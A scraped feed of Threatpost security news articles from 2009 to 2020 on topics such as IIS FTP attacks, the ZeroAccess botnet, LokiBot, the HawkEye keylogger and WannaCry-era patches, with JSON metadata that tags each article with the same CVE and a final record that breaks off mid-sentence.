"[](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>)\n\nLess than a week after the [publication of exploit code](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) for a gaping hole in the FTP Service in Microsoft Internet Information Services (IIS), attackers are launching what is described as \u201climited attacks\u201d against Windows users.\n\nMicrosoft has updated its security advisory to warn of the new attacks and added new mitigation workarounds for business running (IIS) 5.0, 5.1, and 6.0.\n\nIn addition to the in-the-wild attacks, Microsoft warned that a new proof of concept has been published to demonstrate a denial-of-service attack on Windows XP and Windows Server 2003 with read access to the File Transfer Protocol (FTP) service.\n\n\u201cThis does not require Write access,\u201d the company warned. \n\nAlso, a new proof of concept allowing DoS was separately disclosed that affects the version of FTP 6 which shipped with Windows Vista and Windows Server 2008. \n\n * Customers should be aware that the Download Center has FTP 7.5 available for Windows Vista and Windows Server 2008. FTP 7.5 is not vulnerable to any of these exploits.\n\nEarlier this week, [Microsoft issued an advisory](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) to confirm the severity of this vulnerability, which allows remote code execution on affected systems running the FTP service and connected to the Internet.\n", "cvss3": {}, "published": "2009-09-08T11:58:04", "type": "threatpost", "title": "Attackers Pounce on Microsoft FTP in IIS Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:48", "id": "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "href": "https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/72235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. The issue arises when an installer for a program that is already installed on a given machine is executed. When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:UsersusernameAppDataLocalTemp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp `(where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, in which its original name is `HXDS.dll`. This DLL is later loaded by `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency that has massive amounts of compute power and resources to be able to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I would have time. I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Long thought dead, the peer-to-peer (P2P) ZeroAccess botnet has resurfaced, and as of just a few weeks ago, has returned to propagating click-fraud scams.\n\nResearchers with Dell\u2019s SecureWorks [revealed Wednesday](<http://www.secureworks.com/resources/blog/zeroaccess-botnet-resumes-click-fraud-activity-after-six-month-break/>) that they witnessed the botnet restart itself from March 21 to July 2, 2014 and that halfway through this month \u2013 six months after it was last seen \u2013 the botnet has apparently gone back to its old ways and is again doling out click-fraud templates.\n\nClick-fraud, one of the easier techniques cybercriminals use to monetize malware, is essentially the embezzling of ad revenue from clicks that don\u2019t come from legitimate customers.\n\nDespite the botnet\u2019s resurfacing, researchers insist it hasn\u2019t grown or even tried to incorporate new compromises. Instead the botnet, which has split into two smaller botnets that use different UDP ports, is built around hosts from past infections.\n\nAs seen below, researchers found ZeroAccess in two smaller botnets in both 32-bit (blue) and 64-bit (gray) compromised Windows systems.\n\n\n\n\u201cCompromised systems act as nodes in the P2P network, and they periodically receive new templates that include URLs for attack-controlled template servers,\u201d the firm\u2019s Counter Threat Unit (CTU) wrote.\n\nOnce the URLs are visited, like a chain reaction, the bots are redirected to their final destination.\n\nThe unit claims it counted 55,000-plus different IP addresses \u2013 mostly in Japan, India and Russia \u2013 engaging with the botnet from Jan. 17 to Jan. 25. Some may consider 55K small potatoes compared to the botnet\u2019s heyday, when Microsoft cleaned half a million machines of the virus from Feb. to March 2013, but Dell is stressing that for all intents and purposes ZeroAccess should still be considered substantial.\n\nAdding that it may not be able to do what other flashy botnets can, like carry out banking fraud or hold users\u2019 files ransom, ZeroAccess can still wreak havoc on advertisers and machines it infects alike.\n\nIt was thought the [botnet was dead](<http://threatpost.com/microsoft-zeroaccess-botnet-has-been-abandoned/103273>) in December 2013 after Microsoft, along with Europol\u2019s European Cybercrime Centre (EC3), the F.B.I., and the firm A10 [disrupted ZeroAccess\u2019s](<http://threatpost.com/microsoft-and-friends-take-down-zeroaccess-botnet/103122>) two million odd machines. Click-fraud is just one of the botnet\u2019s favorite pastimes. ZeroAccess, a/k/a Sirefef, has also been seen hijacking search results and redirecting victims to malicious, information stealing websites and for a short stint the platform was even spotted [facilitating Bitcoin mining](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/77168>).\n\n[Microsoft greatly curbed](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/100717>) the botnet\u2019s click-fraud tendencies in May 2013 after it added its signature to its Malicious Software Removal Tool (MSRT) and cleaned all the infected machines it could find of ZeroAccess.\n", "cvss3": {}, "published": "2015-01-29T14:25:48", "type": "threatpost", "title": "ZeroAccess Returns, Resumes Click-Fraud Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:27", "id": "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "href": "https://threatpost.com/zeroaccess-botnet-returns-resumes-click-fraud-activity/110736/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:56", "description": "Microsoft is planning to disable support for the weak SSLv3 protocol in Internet Explorer at some undetermined point in the future, and also will remove support for it in the company\u2019s online services soon.\n\nThe security and utility of SSLv3 has been an issue for a long time, but it came into sharper focus earlier this month when researchers at Google released details of a [new attack known as POODLE](<http://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>) that enables an attacker to decrypt protected content under certain circumstances. If an attacker has control of a target\u2019s Internet connection and can force the victim to run some Javascript in her browser, then he can eventually decrypt the content of a session protected by SSLv3. To do so, the attacker needs to be able to force a connection using the outdated protocol, and that can be done by forcing a failed secure connection between a server and client, which will trigger the server to try and renegotiate the secure connection using a different protocol.\n\nSSLv3 is nearly 15 years old and experts have considered it to be a security risk for a long time and have recommended that site operators use newer alternatives such as TLS 1.2. But there are plenty of sites that still support SSLv3 and IE 6, an artifact of a browser, doesn\u2019t support any transport layer security protocols newer than SSLv3 by default. Microsoft officials said the company is planning to remove the ability for IE to fall back to SSLv3 and eventually will disable the protocol by default altogether.\n\n\u201cWe are committed to helping protect our customers and providing the best possible encryption to protect their data. To do this, we\u2019re working to disable fallback to SSL 3.0 in IE, and disable SSL 3.0 by default in IE, and across Microsoft online services, over the coming months,\u201d Tracey Pretorius of the MSRC said in a blog [post](<http://blogs.technet.com/b/msrc/archive/2014/10/29/security-advisory-3009008-released.aspx>).\n\n\u201cMillions of people and thousands of organizations around the world rely on our products and services every day, and while the number of systems that rely on SSL 3.0 exclusively is very small, we recognize that, particularly for enterprises, disabling the protocol may cause some impact. That\u2019s why we\u2019re taking a planned approach to this issue and providing customers with advance notice.\u201d\n\nMicrosoft also is providing a FixIt tool that allows users to disable SSLv3 support in any supported version of IE.\n", "cvss3": {}, "published": "2014-10-29T14:56:06", "type": "threatpost", "title": "Microsoft Plans to Disable SSLv3 in IE, All Online Services", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-05T15:10:14", "id": "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "href": "https://threatpost.com/microsoft-plans-to-disable-sslv3-in-ie-all-online-services/109087/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-09T22:13:17", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that the LokiBot info-stealing trojan is seeing a surge across the enterprise landscape.\n\nThe uptick started in July, according to the agency, and activity has remained \u201cpersistent\u201d ever since.\n\nLokiBot targets Windows and [Android endpoints](<https://threatpost.com/lokibot-redux-common-android-apps/157458/>), and spreads mainly through email (but also via malicious websites, texts and messaging). It typically goes after credentials (usernames, passwords, cryptocurrency wallets and more), as well as personal information. The malware steals the data through the use of a keylogger to monitor browser and desktop activity, CISA explained.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cLokiBot has stolen credentials from multiple applications and data sources, including Windows operating system credentials, email clients, File Transfer Protocol and Secure File Transfer Protocol clients,\u201d according to the alert, [issued Tuesday](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>). \u201cLokiBot has [also] demonstrated the ability to steal credentials from\u2026Safari and Chromium and Mozilla Firefox-based web browsers.\u201d\n\nTo boot, LokiBot can also act as a backdoor into infected systems to pave the way for additional payloads.\n\nLike its Viking namesake, LokiBot is a bit of a trickster, and disguises itself in diverse attachment types, sometimes using steganography for maximum obfuscation. For instance, the malware has been disguised as a .ZIP attachment [hidden inside a .PNG file](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) that can slip past some email security gateways, or [hidden as an ISO disk image](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>) file attachment.\n\nIt also uses a number of application guises. Since LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications,\u201d CISA noted. For instance, in February, it was seen [impersonating a launcher](<https://www.trendmicro.com/en_us/research/20/b/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file.html>) for the popular Fortnite video game.\n\nOther tactics include the use of zipped files along with malicious macros in Microsoft Word and Excel, and leveraging the exploit [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) (an issue in Office Equation Editor that allows attackers to automatically run malicious code without requiring user interaction). The latter is done via malicious RTF files, researchers have observed.\n\nTo boot, researchers [have seen the malware being sold](<https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/>) as a commodity in underground markets, with versions selling for as little as $300.\n\nWith all of these factors taken together, LokiBot represents \u201can attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases,\u201d according to CISA.\n\nSaryu Nayyar, CEO at Gurucul, noted that the advisory is another indication of how malware authors have turned their malicious activities into a scalable business model.\n\n\u201cThe fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,\u201d she said, via email.\n\nTo protect themselves, CISA said that companies should keep patches up to date, disable file- and printer-sharing services if not necessary, enforce multi-factor authentication and strong passwords, enable personal firewalls and scanning of downloads, and implement user education on how to exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known.\n", "cvss3": {}, "published": "2020-09-23T15:27:18", "type": "threatpost", "title": "CISA: LokiBot Stealer Storms Into a Resurgence", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-09-23T15:27:18", "id": "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "href": "https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:06:49", "description": "[](<https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/>)Microsoft has released a new fuzzing tool designed specifically to find mistakes in regular expressions in application code that could be vulnerable to attack. The [SDL Regex Fuzzer](<https://www.microsoft.com/downloads/en/details.aspx?FamilyID=8737519c-52d3-4291-9034-caa71855451f>) identifies problematic lines that might cause an application to be susceptible to attacks that consume huge amounts of resources and cause denial-of-service conditions.\n\nThe new fuzzer is meant to be used specifically to find vulnerable regular expressions in application code that could lead to a special kind of attack known as a ReDoS. Microsoft officials say that as more and more applications are moved to cloud providers, attackers will begin to focus their attention on those applications in new and profitable ways.\n\n\u201cI\u2019ve [predicted](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) before that as cloud computing gains wider adoption, we\u2019ll start to see a significant increase in denial of service (DoS) attacks against those services. When you\u2019re paying for the processor time, bandwidth and storage that your applications use, attacks that explicitly target and consume those resources can get very expensive very quickly, not to mention the costs of downtime for legitimate users. Attackers will shift from pursuing elusive privilege elevation vulnerabilities to simply blackmailing SaaS providers: pay me $10,000 or I\u2019ll make your app consume $20,000 worth of server resources,\u201d Microsoft\u2019s Bryan Sullivan wrote in a blog post explaining the SDL Regex Fuzzer.\n\nAs Sullivan explains in an [article](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) on the problem from earlier this year, a small change to an input string can cause major problems for a regular expression engine.\n\n\u201cHere is where things get \u2018interesting\u2019 (as in horribly dangerous). \nInstead of just checking that the next character after 5 is not the end \nof the string, the engine treats the next character, 6, as a new capture \ngroup and starts rechecking from there. Once that route fails, it backs \nup to 1234 and then tries 56 as a separate capture group, then 5 and 6 \neach as separate capture groups. The end result is that the engine \nactually ends up evaluating 32 different paths,\u201d he wrote. \n\n\u201cIf we now add just \none more numeric character to the evaluation string, the engine will \nhave to evaluate 64 paths\u2014twice as many\u2014to determine that it\u2019s not a \nmatch. This is an exponential increase in the amount of work being \nperformed by the regex engine. An attacker could provide a relatively \nshort input string\u201430 characters or so\u2014and force the engine to process \nhundreds of millions of paths, tying it up for hours or days.\u201d\n\nThe new fuzzer is free to download.\n", "cvss3": {}, "published": "2010-10-13T18:08:57", "type": "threatpost", "title": "Microsoft Releases New Regex Fuzzer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:31", "id": "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "href": "https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/74571/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone that could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL solider from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Prince, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. The card was delivered and soon after, the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI who had an agent follow Price around the neighborhood. After seeing him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to authorities, Price had actually been away from the army since June 2010 and wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-08T12:00:06", "description": "The HawkEye malware kit and information-stealer has been spotted in a newfound slew of campaigns after a recent ownership change.\n\nWhile the keylogger has been in continuous development since 2013, in December a thread on a hacking site noted an ownership change, after which posts on hacking forums began to appear, selling new versions of the kit. \u201cHawkEye Reborn v9\u201d sports new anti-detection features and other changes, researchers said.\n\n\u201cRecent changes in both the ownership and development efforts of the HawkEye Reborn keylogger/stealer demonstrate that this is a threat that will continue to experience ongoing development and improvement moving forward,\u201d said Edmund Brumaghin and Holger Unterbrink, researchers with Cisco Talos, in a [Monday analysis.](<https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html>) \u201cHawkEye has been active across the threat landscape for a long time, and will likely continue to be leveraged in the future as long as the developer of this kit can monetize their efforts.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThis latest version of HawkEye is sold through a licensing model (meaning that purchasers gain access to the software and future updates based on a varying tiered pricing model), and is being marketed on hacking sites as an \u201cadvanced monitoring solution.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/16091412/hawkeye-3.png>)\n\n\u201cThe current developer of the HawkEye Reborn keylogger/stealer is continuously adding support for different applications and software platforms to facilitate the theft of sensitive information and account credentials,\u201d researchers told Threatpost. \u201cThe malware has recently undergone changes to the way in which it is obfuscated and additional anti-analysis techniques have been implemented as well.\u201d\n\nHawkEye Reborn v9 also now features a terms-of-service agreement: While the seller says that the keylogger should only be used on systems with permission, the agreement also explicitly forbids scanning of HawkEye Reborn v9 executables using antivirus software.\n\nIn a further attempt \u201cto minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries,\u201d researchers said that the keylogger also now comes with several anti-analysis features, such as an anti-debugging thread process and the ability to disable certain antivirus-related programs.\n\nIn tandem with the ownership change of HawkEye, researchers observed a slew of campaigns from late 2018 into 2019 that involve this most recent version of the malware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/16091515/hawkeye-2.jpg>)\n\nThe malicious email campaigns include messages that appear to be requesting invoices, bills of materials, order confirmations and other things related to normal corporate functions. However, the emails actually arrive with malicious Microsoft Excel attachments (which exploit an arbitrary code execution bug in Microsoft Office, CVE-2017-11882), as well as RTF (Rich Text Format) or Doc files.\n\nOnce a victim clicks on the attachment, the email-senders have intentionally made the contents of the documents look blurry \u2014 and the user is prompted to enable editing to have a clearer view of the contents. After they do that, the injection process begins, with the HawkEye keylogger being downloaded.\n\nThe malware then snatches up sensitive information, such as the system information, passwords from common web browsers, clipboard contents, desktop screenshots, webcam pictures and account credentials.\n\nThreatpost has reached out to Cisco Talos researchers for further details about the campaigns, including how many there have been, and what victims have been targeted.\n\nMoving forward, researchers warn that HawkEye will continue to evolve. But more significantly, the malware kit represents yet another offering that reduces the barrier for entry for bad actors, who may not necessarily have the programming skills to carry out sophisticated hacks.\n\n\u201cIn many cases, the adversaries leveraging these tools do not need to possess programming skills or in-depth computer science expertise, as they are now being provided as commercial offerings across the cybercriminal underground,\u201d researchers said.\n\n**_Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)**_, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET._**\n\n**_A panel of experts will join Threatpost senior editor Tara Seals to discuss _****_how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS._**\n", "cvss3": {}, "published": "2019-04-16T14:34:54", "type": "threatpost", "title": "Malspam Campaigns Distribute HawkEye Keylogger, Post Ownership Change", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-04-16T14:34:54", "id": "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "href": "https://threatpost.com/hawkeye-keylogger-malspam-campaigns/143807/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T07:10:35", "description": "Phishing attempts more than doubled in 2018, as bad actors sought to trick victims into handing over their credentials. They used both old tricks \u2013 such as scams tied to current events \u2013 as well as other stealthy, fresher tactics.\n\nResearchers with Kaspersky Lab said in a [Tuesday report](<https://securelist.com/spam-and-phishing-in-2018/89701/>) that during the course of 2018, they detected phishing redirection attempts 482.5 million times \u2013 up from the 246.2 million attempts detected in 2017. In total, 18.32 percent of users were attacked, researchers said.\n\n\u201cWe have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019,\u201d according to the report, by Maria Vergelis, Tatyana Shcherbakova and Tatyana Sidorina with Kaspersky Lab. \u201cDespite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of this.\u201d\n\n## Current Events: A Go-To Phishing Hook\n\nBad actors continued to rely on an age-old trick in 2018 for phishing attacks: Using newsworthy events, such as new smartphone launches, [sales seasons](<https://threatpost.com/threatlist-gift-card-themed-bec-holiday-scams-spike/139716/>), [tax deadlines](<https://threatpost.com/fbi-warns-of-spike-in-w-2-phishing-campaigns/130057/>), and the EU General Data Protection Regulation (GDPR) to hook the victim.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12151936/190311-spam-report-2018-1-e1552418397221.png>)\n\nClick to Expand.\n\nPhishing emails purporting to be about GDPR, for instance, boomed [in the first few months](<https://threatpost.com/gdpr-phishing-scam-targets-apple-accounts-financial-data/131915/>) of 2018, because during those months there was an upturn in legitimate GDPR mailings warning users of the transition to the new policies, which require stringent processes to store and process personal data of European citizens.\n\nAttackers unsurprisingly took advantage of this with their own GDPR-related emails: \u201cIt was generally B2B spam \u2014 mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business,\u201d said researchers.\n\nOther top events, such as the 2018 [FIFA World Cup](<https://threatpost.com/world-cup-vacation-scams-lead-in-phishing-trips-this-summer/132543/>) and the launch of the new iPhone sparked phishing attempts, including emails leading to fake FIFA partner websites for the former, and spam messages purporting to sell accessories and replica gadgets for the latter.\n\n## Cryptocurrency Targets\n\nDespite the cryptocurrency market\u2019s [struggle in 2018](<https://www.cnbc.com/2018/10/12/bitcoin-price-cryptocurrency-market-drops-as-xrp-ethereum-plunge.html>), bad actors\u2019 interest in cryptocurrencies appears far from waning. In fact, scammers utilized a number of methods to capitalize on victims\u2019 interests in the cryptocurrency market, such as posing as a cryptocurrency exchange or fake Initial Coin Offering (ICO) bent on convincing victims into transferring money to cryptocurrency wallets.\n\n\u201cIn 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges and platforms,\u201d researchers said. \u201cFraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152522/190311-spam-report-2018-7.png>)\n\nClick to Expand.\n\nWhen it came to ICOs, scammers extended invitations to victims for investing in various ICOs via email and social-media posts.\n\nOne such scam targeted a cryptocurrency called buzcoin; the scammers got ahold of the project mailing list and sent fake presale invitations to subscribers before the ICO began \u2013 eventually making away with $15,000, according to Kaspersky Lab.\n\nThere were also sextortion scams that coerced victims to send cryptocurrency in exchange for keeping quiet about their private online activities, with one campaign in July noted for using victims\u2019 [legitimate password](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) in the email as a scare tactic; and another one in December hit victims with [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>).\n\nResearchers said they don\u2019t expect attackers\u2019 interests in cryptocurrency to die down any time soon: \u201cIn 2019, spammers will continue to exploit the cryptocurrency topic,\u201d they said. \u201cWe expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.\u201d\n\n## Other Tricks\n\nIn 2018, the number of malicious messages in spam was 1.2 times less than in 2017, according to researchers. Of those malicious messages, the most widely distributed malicious objects in email ([Exploit.Win32, CVE-2017-11882](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>)), exploited a patched Microsoft vulnerability that allowed the attacker to perform arbitrary code-execution.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152819/malware-phishing.png>)\n\nClick to Expand.\n\nDespite this downturn in malicious emails, scammers appear to be looking to other sneaky tactics to avoid detection and still make off with victims\u2019 credentials \u2014 in particular using non-typical formats for spam like ISO, IQY, PIF and PUB attachments.\n\n\u201c2018 saw a continuation of the trend for attention to detail in email presentation,\u201d researchers said. \u201cCybercriminals imitated actual business correspondence using the companies\u2019 real details, including signatures and logos.\u201d\n\nIn addition, bad actors appeared to transition to new channels of content distribution beyond email \u2013 including social media sites, services like [Spotify](<https://threatpost.com/spotify-phishers-hijack-music-fans-accounts/139329/>), or even [Google Translate](<https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/>).\n\n\u201cCybercriminals in 2018 used new methods of communication with their \u2018audience,\u2019 including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages,\u201d said researchers. \u201cHand-in-hand with this, as illustrated by [an] attack on universities, fraudsters are seeking not only new channels, but new targets as well.\u201d\n", "cvss3": {}, "published": "2019-03-12T20:48:20", "type": "threatpost", "title": "ThreatList: Phishing Attacks Doubled in 2018", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-03-12T20:48:20", "id": "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "href": "https://threatpost.com/threatlist-phishing-attacks-doubled-in-2018/142732/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:34", "description": "Fearing destructive attacks precipitated by the availability of the nation-state exploits in the wild that spawned the WannaCry outbreak, Microsoft today announced that its Patch Tuesday updates would include fixes for older versions of Windows, including XP.\n\nThe move is unusual and mimics a similar one made in the hours following WannaCry\u2019s appearance on May 12 when hundreds of thousands of Windows machines worldwide were compromised and their data encrypted.\n\nMicrosoft had pleaded with Windows admins to apply MS17-010, a security bulletin released in March, one month before the ShadowBrokers leaked a cadre of weaponized Windows exploits, but many did not take heed. Microsoft had to scramble as WannaCry made its way around the globe to release an [emergency update](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>) late in the evening of May 12 for Windows XP and Windows 8 machines, easing any potential pain for unsupported versions of Windows; EternalBlue, the NSA exploit in question, targeted SMB running on Windows XP and Windows 7 computers.\n\n\u201cDue to the elevated risk for destructive cyber attacks at this time, we made the decision to take this action because applying these updates provides further protection against potential attacks with characteristics similar to WannaCrypt,\u201d said Adrienne Hall, general manager of Microsoft\u2019s Cyber Defense Operations Center.\n\n\u201cIn reviewing the updates for this month, some vulnerabilities were identified that pose elevated risk of cyber attacks by government organizations, sometimes referred to as nation-state actors or other copycat organizations,\u201d Hall said. \u201cTo address this risk, today we are providing additional security updates along with our regular Update Tuesday service. These security updates are being made available to _all_ customers, including those using older versions of 